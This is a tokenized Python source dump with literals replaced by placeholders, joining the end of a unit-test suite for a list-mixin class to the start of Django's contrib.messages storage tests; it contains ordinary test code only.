( pl , ul [ : ] , '<STR_LIT>' % ( i ) ) <EOL> ssl = nextRange ( slen ) <EOL> ul [ : i ] = ssl <EOL> pl [ : i ] = ssl <EOL> self . assertEqual ( pl , ul [ : ] , '<STR_LIT>' % ( i ) ) <EOL> for j in self . limits_plus ( <NUM_LIT:1> ) : <EOL> ssl = nextRange ( slen ) <EOL> ul [ i : j ] = ssl <EOL> pl [ i : j ] = ssl <EOL> self . assertEqual ( pl , ul [ : ] , '<STR_LIT>' % ( i , j ) ) <EOL> for k in self . step_range ( ) : <EOL> ssl = nextRange ( len ( ul [ i : j : k ] ) ) <EOL> ul [ i : j : k ] = ssl <EOL> pl [ i : j : k ] = ssl <EOL> self . assertEqual ( pl , ul [ : ] , '<STR_LIT>' % ( i , j , k ) ) <EOL> sliceLen = len ( ul [ i : j : k ] ) <EOL> self . assertRaises ( ValueError , setfcn , ul , i , j , k , sliceLen + <NUM_LIT:1> ) <EOL> if sliceLen > <NUM_LIT:2> : <EOL> self . assertRaises ( ValueError , setfcn , ul , i , j , k , sliceLen - <NUM_LIT:1> ) <EOL> for k in self . step_range ( ) : <EOL> ssl = nextRange ( len ( ul [ i : : k ] ) ) <EOL> ul [ i : : k ] = ssl <EOL> pl [ i : : k ] = ssl <EOL> self . assertEqual ( pl , ul [ : ] , '<STR_LIT>' % ( i , k ) ) <EOL> ssl = nextRange ( len ( ul [ : i : k ] ) ) <EOL> ul [ : i : k ] = ssl <EOL> pl [ : i : k ] = ssl <EOL> self . assertEqual ( pl , ul [ : ] , '<STR_LIT>' % ( i , k ) ) <EOL> for k in self . step_range ( ) : <EOL> ssl = nextRange ( len ( ul [ : : k ] ) ) <EOL> ul [ : : k ] = ssl <EOL> pl [ : : k ] = ssl <EOL> self . assertEqual ( pl , ul [ : ] , '<STR_LIT>' % ( k ) ) <EOL> def test03_delslice ( self ) : <EOL> '<STR_LIT>' <EOL> for Len in range ( self . limit ) : <EOL> pl , ul = self . lists_of_len ( Len ) <EOL> del pl [ : ] <EOL> del ul [ : ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> for i in range ( - Len - <NUM_LIT:1> , Len + <NUM_LIT:1> ) : <EOL> pl , ul = self . lists_of_len ( Len ) <EOL> del pl [ i : ] <EOL> del ul [ i : ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % ( i ) ) <EOL> pl , ul = self . lists_of_len ( Len ) <EOL> del pl [ : i ] <EOL> del ul [ : i ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % ( i ) ) <EOL> for j in range ( - Len - <NUM_LIT:1> , Len + <NUM_LIT:1> ) : <EOL> pl , ul = self . lists_of_len ( Len ) <EOL> del pl [ i : j ] <EOL> del ul [ i : j ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % ( i , j ) ) <EOL> for k in range ( - Len - <NUM_LIT:1> , <NUM_LIT:0> ) + range ( <NUM_LIT:1> , Len ) : <EOL> pl , ul = self . lists_of_len ( Len ) <EOL> del pl [ i : j : k ] <EOL> del ul [ i : j : k ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % ( i , j , k ) ) <EOL> for k in range ( - Len - <NUM_LIT:1> , <NUM_LIT:0> ) + range ( <NUM_LIT:1> , Len ) : <EOL> pl , ul = self . lists_of_len ( Len ) <EOL> del pl [ : i : k ] <EOL> del ul [ : i : k ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % ( i , k ) ) <EOL> pl , ul = self . lists_of_len ( Len ) <EOL> del pl [ i : : k ] <EOL> del ul [ i : : k ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % ( i , k ) ) <EOL> for k in range ( - Len - <NUM_LIT:1> , <NUM_LIT:0> ) + range ( <NUM_LIT:1> , Len ) : <EOL> pl , ul = self . lists_of_len ( Len ) <EOL> del pl [ : : k ] <EOL> del ul [ : : k ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % ( k ) ) <EOL> def test04_get_set_del_single ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( ) <EOL> for i in self . limits_plus ( <NUM_LIT:0> ) : <EOL> self . assertEqual ( pl [ i ] , ul [ i ] , '<STR_LIT>' % i ) <EOL> for i in self . limits_plus ( <NUM_LIT:0> ) : <EOL> pl , ul = self . lists_of_len ( ) <EOL> pl [ i ] = <NUM_LIT:100> <EOL> ul [ i ] = <NUM_LIT:100> <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % i ) <EOL> for i in self . limits_plus ( <NUM_LIT:0> ) : <EOL> pl , ul = self . lists_of_len ( ) <EOL> del pl [ i ] <EOL> del ul [ i ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % i ) <EOL> def test05_out_of_range_exceptions ( self ) : <EOL> '<STR_LIT>' <EOL> def setfcn ( x , i ) : x [ i ] = <NUM_LIT:20> <EOL> def getfcn ( x , i ) : return x [ i ] <EOL> def delfcn ( x , i ) : del x [ i ] <EOL> pl , ul = self . lists_of_len ( ) <EOL> for i in ( - <NUM_LIT:1> - self . limit , self . limit ) : <EOL> self . assertRaises ( IndexError , setfcn , ul , i ) <EOL> self . assertRaises ( IndexError , getfcn , ul , i ) <EOL> self . assertRaises ( IndexError , delfcn , ul , i ) <EOL> def test06_list_methods ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( ) <EOL> pl . append ( <NUM_LIT> ) <EOL> ul . append ( <NUM_LIT> ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> pl . extend ( range ( <NUM_LIT:50> , <NUM_LIT> ) ) <EOL> ul . extend ( range ( <NUM_LIT:50> , <NUM_LIT> ) ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> pl . reverse ( ) <EOL> ul . reverse ( ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> for i in self . limits_plus ( <NUM_LIT:1> ) : <EOL> pl , ul = self . lists_of_len ( ) <EOL> pl . insert ( i , <NUM_LIT:50> ) <EOL> ul . insert ( i , <NUM_LIT:50> ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % i ) <EOL> for i in self . limits_plus ( <NUM_LIT:0> ) : <EOL> pl , ul = self . lists_of_len ( ) <EOL> self . assertEqual ( pl . pop ( i ) , ul . pop ( i ) , '<STR_LIT>' % i ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % i ) <EOL> pl , ul = self . lists_of_len ( ) <EOL> self . assertEqual ( pl . pop ( ) , ul . pop ( i ) , '<STR_LIT>' ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> pl , ul = self . lists_of_len ( ) <EOL> def popfcn ( x , i ) : x . pop ( i ) <EOL> self . assertRaises ( IndexError , popfcn , ul , self . limit ) <EOL> self . assertRaises ( IndexError , popfcn , ul , - <NUM_LIT:1> - self . limit ) <EOL> pl , ul = self . lists_of_len ( ) <EOL> for val in range ( self . limit ) : <EOL> self . assertEqual ( pl . index ( val ) , ul . index ( val ) , '<STR_LIT>' % val ) <EOL> for val in self . limits_plus ( <NUM_LIT:2> ) : <EOL> self . assertEqual ( pl . count ( val ) , ul . count ( val ) , '<STR_LIT>' % val ) <EOL> for val in range ( self . limit ) : <EOL> pl , ul = self . lists_of_len ( ) <EOL> pl . remove ( val ) <EOL> ul . remove ( val ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % val ) <EOL> def indexfcn ( x , v ) : return x . index ( v ) <EOL> def removefcn ( x , v ) : return x . remove ( v ) <EOL> self . assertRaises ( ValueError , indexfcn , ul , <NUM_LIT> ) <EOL> self . assertRaises ( ValueError , removefcn , ul , <NUM_LIT> ) <EOL> def test07_allowed_types ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( ) <EOL> ul . _allowed = ( int , long ) <EOL> ul [ <NUM_LIT:1> ] = <NUM_LIT:50> <EOL> ul [ : <NUM_LIT:2> ] = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> def setfcn ( x , i , v ) : x [ i ] = v <EOL> self . assertRaises ( TypeError , setfcn , ul , <NUM_LIT:2> , '<STR_LIT:hello>' ) <EOL> self . assertRaises ( TypeError , setfcn , ul , slice ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> ) , ( '<STR_LIT:hello>' , '<STR_LIT>' ) ) <EOL> def test08_min_length ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( ) <EOL> ul . _minlength = <NUM_LIT:1> <EOL> def delfcn ( x , i ) : del x [ : i ] <EOL> def setfcn ( x , i ) : x [ : i ] = [ ] <EOL> for i in range ( self . limit - ul . _minlength + <NUM_LIT:1> , self . limit + <NUM_LIT:1> ) : <EOL> self . assertRaises ( ValueError , delfcn , ul , i ) <EOL> self . assertRaises ( ValueError , setfcn , ul , i ) <EOL> del ul [ : ul . _minlength ] <EOL> ul . _maxlength = <NUM_LIT:4> <EOL> for i in range ( <NUM_LIT:0> , ul . _maxlength - len ( ul ) ) : <EOL> ul . append ( i ) <EOL> self . assertRaises ( ValueError , ul . append , <NUM_LIT:10> ) <EOL> def test09_iterable_check ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( self . limit + <NUM_LIT:1> ) <EOL> def setfcn ( x , i , v ) : x [ i ] = v <EOL> self . assertRaises ( TypeError , setfcn , ul , slice ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> ) , <NUM_LIT:2> ) <EOL> def test10_checkindex ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( ) <EOL> for i in self . limits_plus ( <NUM_LIT:0> ) : <EOL> if i < <NUM_LIT:0> : <EOL> self . assertEqual ( ul . _checkindex ( i ) , i + self . limit , '<STR_LIT>' ) <EOL> else : <EOL> self . assertEqual ( ul . _checkindex ( i ) , i , '<STR_LIT>' ) <EOL> for i in ( - self . limit - <NUM_LIT:1> , self . limit ) : <EOL> self . assertRaises ( IndexError , ul . _checkindex , i ) <EOL> ul . _IndexError = TypeError <EOL> self . assertRaises ( TypeError , ul . _checkindex , - self . limit - <NUM_LIT:1> ) <EOL> def test_11_sorting ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( ) <EOL> pl . insert ( <NUM_LIT:0> , pl . pop ( ) ) <EOL> ul . insert ( <NUM_LIT:0> , ul . pop ( ) ) <EOL> pl . sort ( ) <EOL> ul . sort ( ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> mid = pl [ len ( pl ) / <NUM_LIT:2> ] <EOL> pl . sort ( key = lambda x : ( mid - x ) ** <NUM_LIT:2> ) <EOL> ul . sort ( key = lambda x : ( mid - x ) ** <NUM_LIT:2> ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> pl . insert ( <NUM_LIT:0> , pl . pop ( ) ) <EOL> ul . insert ( <NUM_LIT:0> , ul . pop ( ) ) <EOL> pl . sort ( reverse = True ) <EOL> ul . sort ( reverse = True ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> mid = pl [ len ( pl ) / <NUM_LIT:2> ] <EOL> pl . sort ( key = lambda x : ( mid - x ) ** <NUM_LIT:2> ) <EOL> ul . sort ( key = lambda x : ( mid - x ) ** <NUM_LIT:2> ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> def test_12_arithmetic ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( ) <EOL> al = range ( <NUM_LIT:10> , <NUM_LIT> ) <EOL> self . assertEqual ( list ( pl + al ) , list ( ul + al ) , '<STR_LIT>' ) <EOL> self . assertEqual ( type ( ul ) , type ( ul + al ) , '<STR_LIT>' ) <EOL> self . assertEqual ( list ( al + pl ) , list ( al + ul ) , '<STR_LIT>' ) <EOL> self . assertEqual ( type ( al ) , type ( al + ul ) , '<STR_LIT>' ) <EOL> objid = id ( ul ) <EOL> pl += al <EOL> ul += al <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> self . assertEqual ( objid , id ( ul ) , '<STR_LIT>' ) <EOL> for n in ( - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> ) : <EOL> pl , ul = self . lists_of_len ( ) <EOL> self . assertEqual ( list ( pl * n ) , list ( ul * n ) , '<STR_LIT>' % n ) <EOL> self . assertEqual ( type ( ul ) , type ( ul * n ) , '<STR_LIT>' % n ) <EOL> self . assertEqual ( list ( n * pl ) , list ( n * ul ) , '<STR_LIT>' % n ) <EOL> self . assertEqual ( type ( ul ) , type ( n * ul ) , '<STR_LIT>' % n ) <EOL> objid = id ( ul ) <EOL> pl *= n <EOL> ul *= n <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % n ) <EOL> self . assertEqual ( objid , id ( ul ) , '<STR_LIT>' % n ) <EOL> pl , ul = self . lists_of_len ( ) <EOL> self . assertEqual ( pl , ul , '<STR_LIT>' ) <EOL> self . assertTrue ( pl >= ul , '<STR_LIT>' ) <EOL> self . assertTrue ( pl <= ul , '<STR_LIT>' ) <EOL> self . assertTrue ( ul >= pl , '<STR_LIT>' ) <EOL> self . assertTrue ( ul <= pl , '<STR_LIT>' ) <EOL> self . assertTrue ( pl + [ <NUM_LIT:5> ] > ul , '<STR_LIT>' ) <EOL> self . assertTrue ( pl + [ <NUM_LIT:5> ] >= ul , '<STR_LIT>' ) <EOL> self . assertTrue ( pl < ul + [ <NUM_LIT:2> ] , '<STR_LIT>' ) <EOL> self . assertTrue ( pl <= ul + [ <NUM_LIT:2> ] , '<STR_LIT>' ) <EOL> self . assertTrue ( ul + [ <NUM_LIT:5> ] > pl , '<STR_LIT>' ) <EOL> self . assertTrue ( ul + [ <NUM_LIT:5> ] >= pl , '<STR_LIT>' ) <EOL> self . assertTrue ( ul < pl + [ <NUM_LIT:2> ] , '<STR_LIT>' ) <EOL> self . assertTrue ( ul <= pl + [ <NUM_LIT:2> ] , '<STR_LIT>' ) <EOL> pl [ <NUM_LIT:1> ] = <NUM_LIT:20> <EOL> self . assertTrue ( pl > ul , '<STR_LIT>' ) <EOL> self . assertTrue ( ul < pl , '<STR_LIT>' ) <EOL> pl [ <NUM_LIT:1> ] = - <NUM_LIT:20> <EOL> self . assertTrue ( pl < ul , '<STR_LIT>' ) <EOL> self . assertTrue ( pl < ul , '<STR_LIT>' ) <EOL> class ListMixinTestSingle ( ListMixinTest ) : <EOL> listType = UserListB <EOL> def suite ( ) : <EOL> s = unittest . TestSuite ( ) <EOL> s . addTest ( unittest . makeSuite ( ListMixinTest ) ) <EOL> s . addTest ( unittest . makeSuite ( ListMixinTestSingle ) ) <EOL> return s <EOL> def run ( verbosity = <NUM_LIT:2> ) : <EOL> unittest . TextTestRunner ( verbosity = verbosity ) . run ( suite ( ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> run ( ) </s>
<s> import warnings <EOL> from django import http <EOL> from django . test import TestCase <EOL> from django . conf import settings <EOL> from django . utils . translation import ugettext_lazy <EOL> from django . utils . unittest import skipIf <EOL> from django . contrib . messages import constants , utils , get_level , set_level <EOL> from django . contrib . messages . api import MessageFailure <EOL> from django . contrib . messages . storage import default_storage , base <EOL> from django . contrib . messages . storage . base import Message <EOL> from django . core . urlresolvers import reverse <EOL> from django . contrib . auth . models import User <EOL> def skipUnlessAuthIsInstalled ( func ) : <EOL> return skipIf ( <EOL> '<STR_LIT>' not in settings . INSTALLED_APPS , <EOL> "<STR_LIT>" ) ( func ) <EOL> def add_level_messages ( storage ) : <EOL> """<STR_LIT>""" <EOL> storage . add ( constants . INFO , '<STR_LIT>' ) <EOL> storage . add ( <NUM_LIT> , '<STR_LIT>' ) <EOL> storage . add ( constants . DEBUG , '<STR_LIT>' , extra_tags = '<STR_LIT>' ) <EOL> storage . add ( constants . WARNING , '<STR_LIT>' ) <EOL> storage . add ( constants . ERROR , '<STR_LIT>' ) <EOL> storage . add ( constants . SUCCESS , '<STR_LIT>' ) <EOL> class BaseTest ( TestCase ) : <EOL> storage_class = default_storage <EOL> restore_settings = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> urls = '<STR_LIT>' <EOL> levels = { <EOL> '<STR_LIT>' : constants . DEBUG , <EOL> '<STR_LIT:info>' : constants . INFO , <EOL> '<STR_LIT:success>' : constants . SUCCESS , <EOL> '<STR_LIT>' : constants . WARNING , <EOL> '<STR_LIT:error>' : constants . ERROR , <EOL> } <EOL> def setUp ( self ) : <EOL> self . _remembered_settings = { } <EOL> for setting in self . restore_settings : <EOL> if hasattr ( settings , setting ) : <EOL> self . _remembered_settings [ setting ] = getattr ( settings , setting ) <EOL> delattr ( settings . _wrapped , setting ) <EOL> self . _middleware_classes = settings . MIDDLEWARE_CLASSES <EOL> self . _template_context_processors = settings . TEMPLATE_CONTEXT_PROCESSORS <EOL> self . _installed_apps = settings . INSTALLED_APPS <EOL> self . _message_storage = settings . MESSAGE_STORAGE <EOL> settings . MESSAGE_STORAGE = '<STR_LIT>' % ( self . storage_class . __module__ , <EOL> self . storage_class . __name__ ) <EOL> self . old_TEMPLATE_DIRS = settings . TEMPLATE_DIRS <EOL> settings . TEMPLATE_DIRS = ( ) <EOL> self . save_warnings_state ( ) <EOL> warnings . filterwarnings ( '<STR_LIT:ignore>' , category = DeprecationWarning , <EOL> module = '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> for setting in self . restore_settings : <EOL> self . restore_setting ( setting ) <EOL> settings . MIDDLEWARE_CLASSES = self . _middleware_classes <EOL> settings . TEMPLATE_CONTEXT_PROCESSORS = self . _template_context_processors <EOL> settings . INSTALLED_APPS = self . _installed_apps <EOL> settings . MESSAGE_STORAGE = self . _message_storage <EOL> settings . TEMPLATE_DIRS = self . old_TEMPLATE_DIRS <EOL> self . restore_warnings_state ( ) <EOL> def restore_setting ( self , setting ) : <EOL> if setting in self . _remembered_settings : <EOL> value = self . _remembered_settings . pop ( setting ) <EOL> setattr ( settings , setting , value ) <EOL> elif hasattr ( settings , setting ) : <EOL> delattr ( settings . _wrapped , setting ) <EOL> def get_request ( self ) : <EOL> return http . HttpRequest ( ) <EOL> def get_response ( self ) : <EOL> return http . HttpResponse ( ) <EOL> def get_storage ( self , data = None ) : <EOL> """<STR_LIT>""" <EOL> storage = self . storage_class ( self . get_request ( ) ) <EOL> storage . _loaded_data = data or [ ] <EOL> return storage <EOL> def test_add ( self ) : <EOL> storage = self . get_storage ( ) <EOL> self . assertFalse ( storage . added_new ) <EOL> storage . add ( constants . INFO , '<STR_LIT>' ) <EOL> self . assertTrue ( storage . added_new ) <EOL> storage . add ( constants . INFO , '<STR_LIT>' , extra_tags = '<STR_LIT>' ) <EOL> self . assertEqual ( len ( storage ) , <NUM_LIT:2> ) <EOL> def test_add_lazy_translation ( self ) : <EOL> storage = self . get_storage ( ) <EOL> response = self . get_response ( ) <EOL> storage . add ( constants . INFO , ugettext_lazy ( '<STR_LIT>' ) ) <EOL> storage . update ( response ) <EOL> storing = self . stored_messages_count ( storage , response ) <EOL> self . assertEqual ( storing , <NUM_LIT:1> ) <EOL> def test_no_update ( self ) : <EOL> storage = self . get_storage ( ) <EOL> response = self . get_response ( ) <EOL> storage . update ( response ) <EOL> storing = self . stored_messages_count ( storage , response ) <EOL> self . assertEqual ( storing , <NUM_LIT:0> ) <EOL> def test_add_update ( self ) : <EOL> storage = self . get_storage ( ) <EOL> response = self . get_response ( ) <EOL> storage . add ( constants . INFO , '<STR_LIT>' ) <EOL> storage . add ( constants . INFO , '<STR_LIT>' , extra_tags = '<STR_LIT>' ) <EOL> storage . update ( response ) <EOL> storing = self . stored_messages_count ( storage , response ) <EOL> self . assertEqual ( storing , <NUM_LIT:2> ) <EOL> def test_existing_add_read_update ( self ) : <EOL> storage = self . get_existing_storage ( ) <EOL> response = self . get_response ( ) <EOL> storage . add ( constants . INFO , '<STR_LIT>' ) <EOL> list ( storage ) <EOL> storage . update ( response ) <EOL> storing = self . stored_messages_count ( storage , response ) <EOL> self . assertEqual ( storing , <NUM_LIT:0> ) <EOL> def test_existing_read_add_update ( self ) : <EOL> storage = self . get_existing_storage ( ) <EOL> response = self . get_response ( ) <EOL> list ( storage ) <EOL> storage . add ( constants . INFO , '<STR_LIT>' ) <EOL> storage . update ( response ) <EOL> storing = self . stored_messages_count ( storage , response ) <EOL> self . assertEqual ( storing , <NUM_LIT:1> ) <EOL> def test_full_request_response_cycle ( self ) : <EOL> """<STR_LIT>""" <EOL> settings . MESSAGE_LEVEL = constants . DEBUG <EOL> data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in xrange ( <NUM_LIT:10> ) ] , <EOL> } <EOL> show_url = reverse ( '<STR_LIT>' ) <EOL> for level in ( '<STR_LIT>' , '<STR_LIT:info>' , '<STR_LIT:success>' , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> add_url = reverse ( '<STR_LIT>' , <EOL> args = ( level , ) ) <EOL> response = self . client . post ( add_url , data , follow = True ) <EOL> self . assertRedirects ( response , show_url ) <EOL> self . assertTrue ( '<STR_LIT>' in response . context ) <EOL> messages = [ Message ( self . levels [ level ] , msg ) for msg in <EOL> data [ '<STR_LIT>' ] ] <EOL> self . assertEqual ( list ( response . context [ '<STR_LIT>' ] ) , messages ) <EOL> for msg in data [ '<STR_LIT>' ] : <EOL> self . assertContains ( response , msg ) <EOL> def test_with_template_response ( self ) : <EOL> settings . MESSAGE_LEVEL = constants . DEBUG <EOL> data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in xrange ( <NUM_LIT:10> ) ] , <EOL> } <EOL> show_url = reverse ( '<STR_LIT>' ) <EOL> for level in self . levels . keys ( ) : <EOL> add_url = reverse ( '<STR_LIT>' , <EOL> args = ( level , ) ) <EOL> response = self . client . post ( add_url , data , follow = True ) <EOL> self . assertRedirects ( response , show_url ) <EOL> self . assertTrue ( '<STR_LIT>' in response . context ) <EOL> for msg in data [ '<STR_LIT>' ] : <EOL> self . assertContains ( response , msg ) <EOL> response = self . client . get ( show_url ) <EOL> for msg in data [ '<STR_LIT>' ] : <EOL> self . assertNotContains ( response , msg ) <EOL> def test_multiple_posts ( self ) : <EOL> """<STR_LIT>""" <EOL> settings . MESSAGE_LEVEL = constants . DEBUG <EOL> data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in xrange ( <NUM_LIT:10> ) ] , <EOL> } <EOL> show_url = reverse ( '<STR_LIT>' ) <EOL> messages = [ ] <EOL> for level in ( '<STR_LIT>' , '<STR_LIT:info>' , '<STR_LIT:success>' , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> messages . extend ( [ Message ( self . levels [ level ] , msg ) for msg in <EOL> data [ '<STR_LIT>' ] ] ) <EOL> add_url = reverse ( '<STR_LIT>' , <EOL> args = ( level , ) ) <EOL> self . client . post ( add_url , data ) <EOL> response = self . client . get ( show_url ) <EOL> self . assertTrue ( '<STR_LIT>' in response . context ) <EOL> self . assertEqual ( list ( response . context [ '<STR_LIT>' ] ) , messages ) <EOL> for msg in data [ '<STR_LIT>' ] : <EOL> self . assertContains ( response , msg ) <EOL> @ skipUnlessAuthIsInstalled <EOL> def test_middleware_disabled_auth_user ( self ) : <EOL> """<STR_LIT>""" <EOL> settings . MESSAGE_LEVEL = constants . DEBUG <EOL> user = User . objects . create_user ( '<STR_LIT:test>' , '<STR_LIT>' , '<STR_LIT:test>' ) <EOL> self . client . login ( username = '<STR_LIT:test>' , password = '<STR_LIT:test>' ) <EOL> settings . INSTALLED_APPS = list ( settings . INSTALLED_APPS ) <EOL> settings . INSTALLED_APPS . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> settings . MIDDLEWARE_CLASSES = list ( settings . MIDDLEWARE_CLASSES ) <EOL> settings . MIDDLEWARE_CLASSES . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> settings . TEMPLATE_CONTEXT_PROCESSORS = list ( settings . TEMPLATE_CONTEXT_PROCESSORS ) <EOL> settings . TEMPLATE_CONTEXT_PROCESSORS . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in xrange ( <NUM_LIT:10> ) ] , <EOL> } <EOL> show_url = reverse ( '<STR_LIT>' ) <EOL> for level in ( '<STR_LIT>' , '<STR_LIT:info>' , '<STR_LIT:success>' , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> add_url = reverse ( '<STR_LIT>' , <EOL> args = ( level , ) ) <EOL> response = self . client . post ( add_url , data , follow = True ) <EOL> self . assertRedirects ( response , show_url ) <EOL> self . assertTrue ( '<STR_LIT>' in response . context ) <EOL> context_messages = list ( response . context [ '<STR_LIT>' ] ) <EOL> for msg in data [ '<STR_LIT>' ] : <EOL> self . assertTrue ( msg in context_messages ) <EOL> self . assertContains ( response , msg ) <EOL> def test_middleware_disabled_anon_user ( self ) : <EOL> """<STR_LIT>""" <EOL> settings . MESSAGE_LEVEL = constants . DEBUG <EOL> settings . INSTALLED_APPS = list ( settings . INSTALLED_APPS ) <EOL> settings . INSTALLED_APPS . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> settings . MIDDLEWARE_CLASSES = list ( settings . MIDDLEWARE_CLASSES ) <EOL> settings . MIDDLEWARE_CLASSES . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> settings . TEMPLATE_CONTEXT_PROCESSORS = list ( settings . TEMPLATE_CONTEXT_PROCESSORS ) <EOL> settings . TEMPLATE_CONTEXT_PROCESSORS . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in xrange ( <NUM_LIT:10> ) ] , <EOL> } <EOL> show_url = reverse ( '<STR_LIT>' ) <EOL> for level in ( '<STR_LIT>' , '<STR_LIT:info>' , '<STR_LIT:success>' , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> add_url = reverse ( '<STR_LIT>' , <EOL> args = ( level , ) ) <EOL> self . assertRaises ( MessageFailure , self . client . post , add_url , <EOL> data , follow = True ) <EOL> def test_middleware_disabled_anon_user_fail_silently ( self ) : <EOL> """<STR_LIT>""" <EOL> settings . MESSAGE_LEVEL = constants . DEBUG <EOL> settings . INSTALLED_APPS = list ( settings . INSTALLED_APPS ) <EOL> settings . INSTALLED_APPS . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> settings . MIDDLEWARE_CLASSES = list ( settings . MIDDLEWARE_CLASSES ) <EOL> settings . MIDDLEWARE_CLASSES . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> settings . TEMPLATE_CONTEXT_PROCESSORS = list ( settings . TEMPLATE_CONTEXT_PROCESSORS ) <EOL> settings . TEMPLATE_CONTEXT_PROCESSORS . remove ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in xrange ( <NUM_LIT:10> ) ] , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> show_url = reverse ( '<STR_LIT>' ) <EOL> for level in ( '<STR_LIT>' , '<STR_LIT:info>' , '<STR_LIT:success>' , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> add_url = reverse ( '<STR_LIT>' , <EOL> args = ( level , ) ) <EOL> response = self . client . post ( add_url , data , follow = True ) <EOL> self . assertRedirects ( response , show_url ) <EOL> self . assertTrue ( '<STR_LIT>' in response . context ) <EOL> self . assertEqual ( list ( response . context [ '<STR_LIT>' ] ) , [ ] ) <EOL> def stored_messages_count ( self , storage , response ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def test_get ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def get_existing_storage ( self ) : <EOL> return self . get_storage ( [ Message ( constants . INFO , '<STR_LIT>' ) , <EOL> Message ( constants . INFO , '<STR_LIT>' , <EOL> extra_tags = '<STR_LIT>' ) ] ) <EOL> def test_existing_read ( self ) : <EOL> """<STR_LIT>""" <EOL> storage = self . get_existing_storage ( ) <EOL> self . assertFalse ( storage . used ) <EOL> data = list ( storage ) <EOL> self . assertTrue ( storage . used ) <EOL> self . assertEqual ( data , list ( storage ) ) <EOL> def test_existing_add ( self ) : <EOL> storage = self . get_existing_storage ( ) <EOL> self . assertFalse ( storage . added_new ) <EOL> storage . add ( constants . INFO , '<STR_LIT>' ) <EOL> self . assertTrue ( storage . added_new ) <EOL> def test_default_level ( self ) : <EOL> request = self . get_request ( ) <EOL> self . assertEqual ( get_level ( request ) , constants . INFO ) <EOL> storage = self . get_storage ( ) <EOL> request . _messages = storage <EOL> self . assertEqual ( get_level ( request ) , constants . INFO ) <EOL> add_level_messages ( storage ) <EOL> self . assertEqual ( len ( storage ) , <NUM_LIT:5> ) <EOL> def test_low_level ( self ) : <EOL> request = self . get_request ( ) <EOL> storage = self . storage_class ( request ) <EOL> request . _messages = storage <EOL> self . assertTrue ( set_level ( request , <NUM_LIT:5> ) ) <EOL> self . assertEqual ( get_level ( request ) , <NUM_LIT:5> ) <EOL> add_level_messages ( storage ) <EOL> self . assertEqual ( len ( storage ) , <NUM_LIT:6> ) <EOL> def 